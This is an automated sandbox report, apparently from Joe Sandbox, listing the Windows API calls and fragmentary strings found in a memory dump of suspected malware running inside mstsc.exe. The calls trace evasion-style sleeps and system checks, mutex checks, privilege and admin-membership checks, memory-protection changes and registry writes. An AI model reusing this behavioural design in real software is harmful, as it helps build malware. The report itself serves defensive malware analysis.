HeapAlloc.KERNEL32(00000000), ref: 0006F2D4
GetActiveWindow.USER32 ref: 0006F2EB
GetProcessHeap.KERNEL32(00000008,00000051), ref: 0006F374
HeapAlloc.KERNEL32(00000000), ref: 0006F377
GetModuleHandleW.KERNEL32(00000000), ref: 0006F38D
GetProcessHeap.KERNEL32(00000008,00000208), ref: 0006F3BF
HeapAlloc.KERNEL32(00000000), ref: 0006F3C2
GetProcessHeap.KERNEL32(00000008,00000208), ref: 0006F3D4
HeapAlloc.KERNEL32(00000000), ref: 0006F3D7
ExpandEnvironmentStringsW.KERNEL32(?,KCBqiNhR7x,00000104), ref: 0006F405
ExpandEnvironmentStringsW.KERNEL32(00000000,00000005,00000104), ref: 0006F410

Part of subcall function 0006BE1A: GetProcessHeap.KERNEL32(00000008,0000000E,76E645DF,00000000,76E6FE8D), ref: 0006BE64
Part of subcall function 0006BE1A: HeapAlloc.KERNEL32(00000000), ref: 0006BE6B
Part of subcall function 0006BE1A: GetFocus.USER32 ref: 0006BE7C
Part of subcall function 0006BE1A: GetEnvironmentVariableA.KERNEL32(00000000,?,00000104), ref: 0006BEB5
Part of subcall function 0006BE1A: lstrlenA.KERNEL32(?), ref: 0006BEC9
Part of subcall function 0006BE1A: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006BEEA
Part of subcall function 0006BE1A: HeapFree.KERNEL32(00000000), ref: 0006BEF1

Sleep.KERNEL32(000000FF), ref: 0006F4A1

Part of subcall function 0006B8CA: PathFindFileNameW.SHLWAPI(76E645DF,00000000,76E6FE8D,?,?,?,?,?,?,KCBqiNhR7x,0006F429), ref: 0006B8D9

StrStrIW.SHLWAPI(7142434B), ref: 0006F44D
StrStrIW.SHLWAPI(00000005), ref: 0006F45C

Part of subcall function 000619C7: Sleep.KERNEL32(00002710,76AD46E9,76E6FE8D,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 00061A14
Part of subcall function 000619C7: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 00061A24
Part of subcall function 000619C7: VirtualProtect.KERNEL32(00072000,00000184,00000040,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 00061A85
Part of subcall function 000619C7: VirtualProtect.KERNEL32(00072000,00000184,?,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 00061A9F
Part of subcall function 000619C7: GlobalAddAtomW.KERNEL32 ref: 00061ABF
Part of subcall function 000619C7: AddAtomW.KERNEL32 ref: 00061ACB
Part of subcall function 000619C7: GetProcessHeap.KERNEL32(00000000,?,?,?,?,KCBqiNhR7x,0006F467), ref: 00061AFB
Part of subcall function 000619C7: HeapFree.KERNEL32(00000000), ref: 00061B02

Part of subcall function 0006890F: lstrlenW.KERNEL32(00106D80,76AD46E9,7142434B,76E6FE8D), ref: 00068921
Part of subcall function 0006890F: GetProcessHeap.KERNEL32(00000008,00000000), ref: 00068941
Part of subcall function 0006890F: HeapAlloc.KERNEL32(00000000), ref: 00068944
Part of subcall function 0006890F: GetProcessHeap.KERNEL32(00000008,?), ref: 00068963
Part of subcall function 0006890F: HeapAlloc.KERNEL32(00000000), ref: 00068966
Part of subcall function 0006890F: lstrcpyW.KERNEL32(00000000,?), ref: 0006897B
Part of subcall function 0006890F: GetProcessHeap.KERNEL32(00000008,00000021), ref: 000689BB
Part of subcall function 0006890F: HeapAlloc.KERNEL32(00000000), ref: 000689BE
Part of subcall function 0006890F: GetClipboardOwner.USER32 ref: 000689D2
Part of subcall function 0006890F: GetTickCount.KERNEL32(00000005), ref: 000689FE
Part of subcall function 0006890F: wsprintfW.USER32 ref: 00068A0F
Part of subcall function 0006890F: wsprintfW.USER32 ref: 00068A1F
Part of subcall function 0006890F: GetProcessHeap.KERNEL32(00000008,00000104), ref: 00068A33
Part of subcall function 0006890F: HeapAlloc.KERNEL32(00000000), ref: 00068A36
Part of subcall function 0006890F: GetTickCount.KERNEL32 ref: 00068A47
Part of subcall function 0006890F: GetProcessHeap.KERNEL32(00000008,00000044), ref: 00068AE0
Part of subcall function 0006890F: HeapAlloc.KERNEL32(00000000), ref: 00068AE3
Part of subcall function 0006890F: GetClipboardSequenceNumber.USER32 ref: 00068AF7
Part of subcall function 0006890F: wsprintfA.USER32 ref: 00068B2D
Part of subcall function 0006890F: GetProcessHeap.KERNEL32(00000000,?), ref: 00068B60
Part of subcall function 0006890F: HeapFree.KERNEL32(00000000), ref: 00068B67
Part of subcall function 0006890F: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00068B76
Part of subcall function 0006890F: HeapFree.KERNEL32(00000000), ref: 00068B79
Part of subcall function 0006890F: GetProcessHeap.KERNEL32(00000000,?), ref: 00068B84
Part of subcall function 0006890F: HeapFree.KERNEL32(00000000), ref: 00068B87
Part of subcall function 0006890F: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00068B90
Part of subcall function 0006890F: HeapFree.KERNEL32(00000000), ref: 00068B93
Part of subcall function 0006890F: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00068B9F
Part of subcall function 0006890F: HeapFree.KERNEL32(00000000), ref: 00068BA2

Part of subcall function 0006EE9B: GetProcessHeap.KERNEL32(00000008,00000061,76AD46E9,7142434B,76E6FE8D), ref: 0006EF0F
Part of subcall function 0006EE9B: HeapAlloc.KERNEL32(00000000), ref: 0006EF12
Part of subcall function 0006EE9B: GetForegroundWindow.USER32 ref: 0006EF23
Part of subcall function 0006EE9B: OpenMutexW.KERNEL32(001F0001,00000000,00000000), ref: 0006EF58
Part of subcall function 0006EE9B: CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 0006EF6B
Part of subcall function 0006EE9B: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006EF73
Part of subcall function 0006EE9B: HeapFree.KERNEL32(00000000), ref: 0006EF76
Part of subcall function 0006EE9B: ExitProcess.KERNEL32 ref: 0006EF84

CreateThread.KERNEL32(00000000,00000000,0006C737,00000000,00000000,00000000), ref: 0006F47A
CloseHandle.KERNEL32(00000000), ref: 0006F481
GetProcessHeap.KERNEL32(00000000,7142434B), ref: 0006F48A
HeapFree.KERNEL32(00000000), ref: 0006F493
GetProcessHeap.KERNEL32(00000000,00000005), ref: 0006F49A

Strings

N, xrefs: 0006F2C0
4$NU, xrefs: 0006F150
N, xrefs: 0006F265
Cgq5, xrefs: 0006F343
y{[W, xrefs: 0006EFED
i, xrefs: 0006F365
Bq, xrefs: 0006F35F
JWd#, xrefs: 0006F296
45N&, xrefs: 0006F13B
N0q, xrefs: 0006F149
7, xrefs: 0006F079
Uqu4AN, xrefs: 0006F191
!J6d, xrefs: 0006F241
CN)J, xrefs: 0006F248
J+df, xrefs: 0006F2B9
PJ6d, xrefs: 0006F22C
i.C/, xrefs: 0006F32E
q;K,, xrefs: 0006F335
KCBqiNhR7x, xrefs: 0006F3A3
6N%J, xrefs: 0006F233
Hiyn5, xrefs: 0006F03A
i8C), xrefs: 0006F351
d, xrefs: 0006F25F
3d'N, xrefs: 0006F23A

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006C055, Relevance: 98.3, APIs: 36, Strings: 20, Instructions: 327

APIs

GetProcessHeap.KERNEL32(00000008,0000000E), ref: 0006C0CB
HeapAlloc.KERNEL32(00000000), ref: 0006C0CE
IsSystemResumeAutomatic.KERNEL32 ref: 0006C0FA
GetProcessHeap.KERNEL32(00000008,00000015), ref: 0006C162
HeapAlloc.KERNEL32(00000000), ref: 0006C165
GetClipboardSequenceNumber.USER32 ref: 0006C18A
GetModuleHandleA.KERNEL32(?,00000000), ref: 0006C1C0
GetProcAddress.KERNEL32(00000000), ref: 0006C1C7
GlobalMemoryStatusEx.KERNELBASE(?), ref: 0006C1E2
GetSystemInfo.KERNEL32(?), ref: 0006C1F8
GetProcessHeap.KERNEL32(00000008,000000BD), ref: 0006C30F
HeapAlloc.KERNEL32(00000000), ref: 0006C312
GetDesktopWindow.USER32 ref: 0006C32E
RegOpenKeyW.ADVAPI32(80000002,00000000,?), ref: 0006C365
GetProcessHeap.KERNEL32(00000008,00000051), ref: 0006C3E0
HeapAlloc.KERNEL32(00000000), ref: 0006C3E7
GetClipboardViewer.USER32 ref: 0006C403
RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 0006C448
GetProcessHeap.KERNEL32(00000008,00000015), ref: 0006C4A1
HeapAlloc.KERNEL32(00000000), ref: 0006C4A8
CountClipboardFormats.USER32 ref: 0006C4C0
StrStrIW.SHLWAPI(?,00000000), ref: 0006C4F8
Sleep.KERNEL32(00002710), ref: 0006C505
StrStrIW.SHLWAPI(?,00000000), ref: 0006C514
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006C51C
HeapFree.KERNEL32(00000000), ref: 0006C529
RegCloseKey.ADVAPI32(?), ref: 0006C536
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006C540
HeapFree.KERNEL32(00000000), ref: 0006C547
Sleep.KERNELBASE(00002710), ref: 0006C56E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006C59A
HeapFree.KERNEL32(00000000), ref: 0006C59D
GetProcessHeap.KERNEL32(00000000,?), ref: 0006C5A3
HeapFree.KERNEL32(00000000), ref: 0006C5A6
GetProcessHeap.KERNEL32(00000000,?), ref: 0006C5B2
HeapFree.KERNEL32(00000000), ref: 0006C5B5

Strings

RA, xrefs: 0006C48D
c, xrefs: 0006C0B9
Wi, xrefs: 0006C308
p 3, xrefs: 0006C3B1
jquR, xrefs: 0006C494
hZ, xrefs: 0006C2F6
%i4i, xrefs: 0006C20D
A, xrefs: 0006C49C
"iZ, xrefs: 0006C21D
9c&p, xrefs: 0006C3A1
&A%$, xrefs: 0006C133
Kc, xrefs: 0006C3D9
hps3, xrefs: 0006C3D1
)S#R, xrefs: 0006C14B
$iZ, xrefs: 0006C27D
%i1i, xrefs: 0006C2A9
qBc2, xrefs: 0006C0F0
+Z2i, xrefs: 0006C293
@, xrefs: 0006C1CF
4i5i, xrefs: 0006C2CA

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 00064521, Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 116

APIs

GetModuleHandleW.KERNEL32(00000000,7142434B,00106D80,?,?,?,?,?,?,?,?,?,?,000619F5,76AD46E9,76E6FE8D), ref: 0006453A
GetCurrentProcess.KERNEL32(00000008,000619F5,?,?,?,?,?,?,?,?,?,?,000619F5,76AD46E9,76E6FE8D), ref: 00064546
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,000619F5,76AD46E9,76E6FE8D), ref: 0006454D
GetTokenInformation.KERNELBASE(000619F5,00000001,00000000,76E6FE8D,76E6FE8D,?,?,?,?,?,?,?,?,?,?,000619F5), ref: 00064570
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,000619F5,76AD46E9,76E6FE8D), ref: 00064572
GlobalAlloc.KERNEL32(00000040,76E6FE8D,?,?,?,?,?,?,?,?,?,?,?,000619F5,76AD46E9,76E6FE8D), ref: 00064587
GetTokenInformation.ADVAPI32(000619F5,00000001,00000000,76E6FE8D,76E6FE8D,?,?,?,?,?,?,?,?,?,?,000619F5), ref: 000645A7
ConvertSidToStringSidW.ADVAPI32(00000000,76AD46E9), ref: 000645B7
GetProcessHeap.KERNEL32(00000008,00000025), ref: 00064601
HeapAlloc.KERNEL32(00000000), ref: 00064608
GetCapture.USER32 ref: 00064617
StrCmpIW.SHLWAPI(00000000,76AD46E9), ref: 00064647
LocalFree.KERNEL32(76AD46E9), ref: 0006465B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00064664
HeapFree.KERNEL32(00000000), ref: 0006466B
GlobalFree.KERNEL32(00000000), ref: 00064675
CloseHandle.KERNEL32(000619F5), ref: 0006467F

Strings

xTYA, xrefs: 000645F4
lAww, xrefs: 000645E0
ITaA, xrefs: 000645E7
kwUT, xrefs: 000645D9
+TtA, xrefs: 000645D2

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 000674D8, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 123

APIs

GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,00000000), ref: 0006752D
HeapAlloc.KERNEL32(00000000), ref: 00067530
GetMessageTime.USER32 ref: 00067544
GetProcessHeap.KERNEL32(00000008,0000000E), ref: 0006759E
HeapAlloc.KERNEL32(00000000), ref: 000675A1
IsSystemResumeAutomatic.KERNEL32 ref: 000675B5
GetModuleHandleA.KERNEL32(00000000,?), ref: 000675E6
GetProcAddress.KERNEL32(00000000), ref: 000675ED
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00067601
HeapFree.KERNEL32(00000000), ref: 0006760A
GetProcessHeap.KERNEL32(00000000,?), ref: 0006760F
HeapFree.KERNEL32(00000000), ref: 00067612
OpenProcess.KERNEL32(00000400,00000000,?,00000000), ref: 0006762E
IsWow64Process.KERNELBASE(00000000,00000000), ref: 0006763F
CloseHandle.KERNEL32(00000000), ref: 0006764D

Strings

3!'Q, xrefs: 0006750F
qBc2, xrefs: 00067593

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006E897, Relevance: 16.6, APIs: 11, Instructions: 81

APIs

OpenProcessToken.ADVAPI32(00000000,00000008,?,00000000,00000000,00000000,?,0006F1FF), ref: 0006E8A6
GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,?,?,?,0006F1FF), ref: 0006E8C2
GetLastError.KERNEL32(?,0006F1FF), ref: 0006E8D0
GetProcessHeap.KERNEL32(00000008,?,76E6FE8D,?,0006F1FF), ref: 0006E8E1
HeapAlloc.KERNEL32(00000000,?,0006F1FF), ref: 0006E8E8
GetTokenInformation.KERNELBASE(?,00000019,00000000,?,?,?,0006F1FF), ref: 0006E901
GetSidSubAuthorityCount.ADVAPI32(00000000,?,0006F1FF), ref: 0006E90D
GetSidSubAuthority.ADVAPI32(00000000,?,?,0006F1FF), ref: 0006E924
GetProcessHeap.KERNEL32(00000000,00000000,?,0006F1FF), ref: 0006E946
HeapFree.KERNEL32(00000000,?,0006F1FF), ref: 0006E94D
CloseHandle.KERNEL32(?), ref: 0006E957

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 000619C7, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 102

APIs

Part of subcall function 00064521: GetModuleHandleW.KERNEL32(00000000,7142434B,00106D80,?,?,?,?,?,?,?,?,?,?,000619F5,76AD46E9,76E6FE8D), ref: 0006453A
Part of subcall function 00064521: GetCurrentProcess.KERNEL32(00000008,000619F5,?,?,?,?,?,?,?,?,?,?,000619F5,76AD46E9,76E6FE8D), ref: 00064546
Part of subcall function 00064521: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,000619F5,76AD46E9,76E6FE8D), ref: 0006454D
Part of subcall function 00064521: GetTokenInformation.KERNELBASE(000619F5,00000001,00000000,76E6FE8D,76E6FE8D,?,?,?,?,?,?,?,?,?,?,000619F5), ref: 00064570
Part of subcall function 00064521: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,000619F5,76AD46E9,76E6FE8D), ref: 00064572
Part of subcall function 00064521: GlobalAlloc.KERNEL32(00000040,76E6FE8D,?,?,?,?,?,?,?,?,?,?,?,000619F5,76AD46E9,76E6FE8D), ref: 00064587
Part of subcall function 00064521: GetTokenInformation.ADVAPI32(000619F5,00000001,00000000,76E6FE8D,76E6FE8D,?,?,?,?,?,?,?,?,?,?,000619F5), ref: 000645A7
Part of subcall function 00064521: ConvertSidToStringSidW.ADVAPI32(00000000,76AD46E9), ref: 000645B7
Part of subcall function 00064521: GetProcessHeap.KERNEL32(00000008,00000025), ref: 00064601
Part of subcall function 00064521: HeapAlloc.KERNEL32(00000000), ref: 00064608
Part of subcall function 00064521: GetCapture.USER32 ref: 00064617
Part of subcall function 00064521: StrCmpIW.SHLWAPI(00000000,76AD46E9), ref: 00064647
Part of subcall function 00064521: LocalFree.KERNEL32(76AD46E9), ref: 0006465B
Part of subcall function 00064521: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00064664
Part of subcall function 00064521: HeapFree.KERNEL32(00000000), ref: 0006466B
Part of subcall function 00064521: GlobalFree.KERNEL32(00000000), ref: 00064675
Part of subcall function 00064521: CloseHandle.KERNEL32(000619F5), ref: 0006467F

Part of subcall function 0006BE1A: GetProcessHeap.KERNEL32(00000008,0000000E,76E645DF,00000000,76E6FE8D), ref: 0006BE64
Part of subcall function 0006BE1A: HeapAlloc.KERNEL32(00000000), ref: 0006BE6B
Part of subcall function 0006BE1A: GetFocus.USER32 ref: 0006BE7C
Part of subcall function 0006BE1A: GetEnvironmentVariableA.KERNEL32(00000000,?,00000104), ref: 0006BEB5
Part of subcall function 0006BE1A: lstrlenA.KERNEL32(?), ref: 0006BEC9
Part of subcall function 0006BE1A: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006BEEA
Part of subcall function 0006BE1A: HeapFree.KERNEL32(00000000), ref: 0006BEF1

Sleep.KERNEL32(00002710,76AD46E9,76E6FE8D,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 00061A14
GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 00061A24

Part of subcall function 0006E6ED: GetModuleHandleW.KERNEL32(00000000,7142434B,00106D80,?,?,?,?,?,?,?,?,00061A31), ref: 0006E6FD
Part of subcall function 0006E6ED: GetVersion.KERNEL32(?,?,?,?,?,?,?,?,00061A31,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006E703
Part of subcall function 0006E6ED: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00061A31,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006E70E
Part of subcall function 0006E6ED: GetProcessHeap.KERNEL32(00000008,00000020,?,?,?,?,?,?,?,?,00061A31), ref: 0006E72D
Part of subcall function 0006E6ED: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00061A31,?,?,?,?,?,KCBqiNhR7x), ref: 0006E736
Part of subcall function 0006E6ED: GetComputerNameW.KERNEL32(00000000,?), ref: 0006E751
Part of subcall function 0006E6ED: GetProcessHeap.KERNEL32(00000008,0000001D,?), ref: 0006E78C
Part of subcall function 0006E6ED: HeapAlloc.KERNEL32(00000000), ref: 0006E78F
Part of subcall function 0006E6ED: GetClipboardOwner.USER32 ref: 0006E79C
Part of subcall function 0006E6ED: lstrcpyW.KERNEL32(00000000), ref: 0006E7CF
Part of subcall function 0006E6ED: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006E7DE
Part of subcall function 0006E6ED: HeapFree.KERNEL32(00000000), ref: 0006E7E1
Part of subcall function 0006E6ED: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0006E80F
Part of subcall function 0006E6ED: CheckTokenMembership.ADVAPI32(00000000,?,00061A31), ref: 0006E82A
Part of subcall function 0006E6ED: FreeSid.ADVAPI32(?), ref: 0006E836
Part of subcall function 0006E6ED: CreateWellKnownSid.ADVAPI32(00000027,00000000,?,00061A31), ref: 0006E866
Part of subcall function 0006E6ED: CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0006E87C

Part of subcall function 000641E5: GetProcessHeap.KERNEL32(00000008,0000000B,?,7142434B,00106D80), ref: 00064237
Part of subcall function 000641E5: HeapAlloc.KERNEL32(00000000), ref: 0006423A
Part of subcall function 000641E5: GetShellWindow.USER32 ref: 00064255
Part of subcall function 000641E5: GetProcessHeap.KERNEL32(00000008,0000000F), ref: 000642AC
Part of subcall function 000641E5: HeapAlloc.KERNEL32(00000000), ref: 000642AF
Part of subcall function 000641E5: GetDoubleClickTime.USER32 ref: 000642CD
Part of subcall function 000641E5: LoadLibraryA.KERNEL32(?), ref: 000642F7
Part of subcall function 000641E5: GetProcAddress.KERNEL32(00000000), ref: 000642FE
Part of subcall function 000641E5: GetProcessHeap.KERNEL32(00000008,00000014), ref: 00064376
Part of subcall function 000641E5: HeapAlloc.KERNEL32(00000000), ref: 00064379
Part of subcall function 000641E5: GetDialogBaseUnits.USER32 ref: 00064390
Part of subcall function 000641E5: LoadLibraryA.KERNEL32(?), ref: 000643BA
Part of subcall function 000641E5: GetProcAddress.KERNEL32(00000000), ref: 000643C1
Part of subcall function 000641E5: GetProcessHeap.KERNEL32(00000008,00000019), ref: 00064419
Part of subcall function 000641E5: HeapAlloc.KERNEL32(00000000), ref: 0006441C
Part of subcall function 000641E5: CloseClipboard.USER32 ref: 00064433
Part of subcall function 000641E5: LoadLibraryA.KERNEL32(?), ref: 0006445D
Part of subcall function 000641E5: GetProcAddress.KERNEL32(00000000), ref: 00064464
Part of subcall function 000641E5: GetProcessHeap.KERNEL32(00000008,00061A39), ref: 00064487
Part of subcall function 000641E5: HeapAlloc.KERNEL32(00000000), ref: 0006448A
Part of subcall function 000641E5: GetProcessHeap.KERNEL32(00000000,00000005), ref: 000644C8
Part of subcall function 000641E5: HeapFree.KERNEL32(00000000), ref: 000644CB
Part of subcall function 000641E5: CloseHandle.KERNEL32(?), ref: 000644D4
Part of subcall function 000641E5: GetProcessHeap.KERNEL32(00000000,00000000), ref: 000644DD
Part of subcall function 000641E5: HeapFree.KERNEL32(00000000), ref: 000644E0
Part of subcall function 000641E5: CloseHandle.KERNEL32(?), ref: 000644EC
Part of subcall function 000641E5: GetProcessHeap.KERNEL32(00000000,00000000), ref: 000644F5
Part of subcall function 000641E5: HeapFree.KERNEL32(00000000), ref: 000644F8
Part of subcall function 000641E5: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00064504
Part of subcall function 000641E5: HeapFree.KERNEL32(00000000), ref: 0006450D
Part of subcall function 000641E5: GetProcessHeap.KERNEL32(00000000,?), ref: 00064512
Part of subcall function 000641E5: HeapFree.KERNEL32(00000000), ref: 00064515

Part of subcall function 0006BF00: GetProcessHeap.KERNEL32(00000008,00000015,?,?,?,?,?,?,?,7142434B,00106D80), ref: 0006BF97
Part of subcall function 0006BF00: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,7142434B,00106D80), ref: 0006BF9A
Part of subcall function 0006BF00: GetFocus.USER32 ref: 0006BFAB
Part of subcall function 0006BF00: lstrcatW.KERNEL32(00000000), ref: 0006BFDE
Part of subcall function 0006BF00: GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,7142434B,00106D80), ref: 0006C012
Part of subcall function 0006BF00: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,7142434B,00106D80), ref: 0006C042
Part of subcall function 0006BF00: HeapFree.KERNEL32(00000000), ref: 0006C045

VirtualProtect.KERNEL32(00072000,00000184,00000040,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 00061A85
VirtualProtect.KERNEL32(00072000,00000184,?,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 00061A9F

Part of subcall function 0006FCD2: GetProcessHeap.KERNEL32(00000008,0000004D,00072000,7142434B,00106D80), ref: 0006FD46
Part of subcall function 0006FCD2: HeapAlloc.KERNEL32(00000000), ref: 0006FD49
Part of subcall function 0006FCD2: GetDialogBaseUnits.USER32 ref: 0006FD64
Part of subcall function 0006FCD2: RegOpenKeyExW.ADVAPI32(?,00000000,00000000,000F003F,00000000), ref: 0006FD98
Part of subcall function 0006FCD2: GetProcessHeap.KERNEL32(00000008,0000003D), ref: 0006FDFD
Part of subcall function 0006FCD2: HeapAlloc.KERNEL32(00000000), ref: 0006FE00
Part of subcall function 0006FCD2: CloseClipboard.USER32 ref: 0006FE14
Part of subcall function 0006FCD2: RegSetValueExW.ADVAPI32(00000000,00000000,00000000,00000004,?,00000004), ref: 0006FE47
Part of subcall function 0006FCD2: RegCloseKey.ADVAPI32(00000000), ref: 0006FE50
Part of subcall function 0006FCD2: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006FE5F
Part of subcall function 0006FCD2: HeapFree.KERNEL32(00000000), ref: 0006FE62
Part of subcall function 0006FCD2: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006FE6E
Part of subcall function 0006FCD2: HeapFree.KERNEL32(00000000), ref: 0006FE71

GlobalAddAtomW.KERNEL32 ref: 00061ABF
AddAtomW.KERNEL32 ref: 00061ACB

Part of subcall function 0006D9F1: CreateFileW.KERNEL32(00106D80,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0006DA1F
Part of subcall function 0006D9F1: GetFileSize.KERNEL32(00000000,00000000,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DA2E
Part of subcall function 0006D9F1: GetProcessHeap.KERNEL32(00000008,00000002,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DA47
Part of subcall function 0006D9F1: HeapAlloc.KERNEL32(00000000,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DA4E
Part of subcall function 0006D9F1: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0006DA63
Part of subcall function 0006D9F1: GetLastError.KERNEL32(?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DA8B
Part of subcall function 0006D9F1: CloseHandle.KERNEL32(00000000), ref: 0006DA99
Part of subcall function 0006D9F1: GetProcessHeap.KERNEL32(00000000,00000000,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DAB0
Part of subcall function 0006D9F1: HeapFree.KERNEL32(00000000,?,00061ADF), ref: 0006DAB7
Part of subcall function 0006D9F1: GetProcessHeap.KERNEL32(00000000,?,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DAC3
Part of subcall function 0006D9F1: HeapFree.KERNEL32(00000000,?,00061ADF), ref: 0006DACA

Part of subcall function 0006E684: GetModuleHandleA.KERNEL32(?,?), ref: 0006E6BD
Part of subcall function 0006E684: GetProcAddress.KERNEL32(00000000), ref: 0006E6C4

Part of subcall function 000616A9: GetProcessHeap.KERNEL32(00000008,00000208,7142434B), ref: 000616C4
Part of subcall function 000616A9: HeapAlloc.KERNEL32(00000000), ref: 000616C7
Part of subcall function 000616A9: GetProcessHeap.KERNEL32(00000008,0000009D), ref: 000617AA
Part of subcall function 000616A9: HeapAlloc.KERNEL32(00000000), ref: 000617AD
Part of subcall function 000616A9: GetActiveWindow.USER32 ref: 000617C1
Part of subcall function 000616A9: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104), ref: 000617F0
Part of subcall function 000616A9: GetProcessHeap.KERNEL32(00000008,00000039), ref: 00061836
Part of subcall function 000616A9: HeapAlloc.KERNEL32(00000000), ref: 0006183D
Part of subcall function 000616A9: GetCaretBlinkTime.USER32 ref: 00061854
Part of subcall function 000616A9: StrStrIW.SHLWAPI(?,00000000), ref: 0006187E
Part of subcall function 000616A9: GetProcessHeap.KERNEL32(00000008,00000051), ref: 000618ED
Part of subcall function 000616A9: HeapAlloc.KERNEL32(00000000), ref: 000618F4
Part of subcall function 000616A9: GetModuleHandleW.KERNEL32(00000000), ref: 0006190A
Part of subcall function 000616A9: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104), ref: 00061939
Part of subcall function 000616A9: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00061942
Part of subcall function 000616A9: HeapFree.KERNEL32(00000000), ref: 00061949
Part of subcall function 000616A9: StrCatW.SHLWAPI(?), ref: 0006195C
Part of subcall function 000616A9: GetProcessHeap.KERNEL32(00000000,?), ref: 0006199E
Part of subcall function 000616A9: HeapFree.KERNEL32(00000000), ref: 000619A1
Part of subcall function 000616A9: GetProcessHeap.KERNEL32(00000000,00000000), ref: 000619AA
Part of subcall function 000616A9: HeapFree.KERNEL32(00000000), ref: 000619B3
Part of subcall function 000616A9: GetProcessHeap.KERNEL32(00000000,?), ref: 000619B8
Part of subcall function 000616A9: HeapFree.KERNEL32(00000000), ref: 000619BB

GetProcessHeap.KERNEL32(00000000,?,?,?,?,KCBqiNhR7x,0006F467), ref: 00061AFB
HeapFree.KERNEL32(00000000), ref: 00061B02

Part of subcall function 0006C055: GetProcessHeap.KERNEL32(00000008,0000000E), ref: 0006C0CB
Part of subcall function 0006C055: HeapAlloc.KERNEL32(00000000), ref: 0006C0CE
Part of subcall function 0006C055: IsSystemResumeAutomatic.KERNEL32 ref: 0006C0FA
Part of subcall function 0006C055: GetProcessHeap.KERNEL32(00000008,00000015), ref: 0006C162
Part of subcall function 0006C055: HeapAlloc.KERNEL32(00000000), ref: 0006C165
Part of subcall function 0006C055: GetClipboardSequenceNumber.USER32 ref: 0006C18A
Part of subcall function 0006C055: GetModuleHandleA.KERNEL32(?,00000000), ref: 0006C1C0
Part of subcall function 0006C055: GetProcAddress.KERNEL32(00000000), ref: 0006C1C7
Part of subcall function 0006C055: GlobalMemoryStatusEx.KERNELBASE(?), ref: 0006C1E2
Part of subcall function 0006C055: GetSystemInfo.KERNEL32(?), ref: 0006C1F8
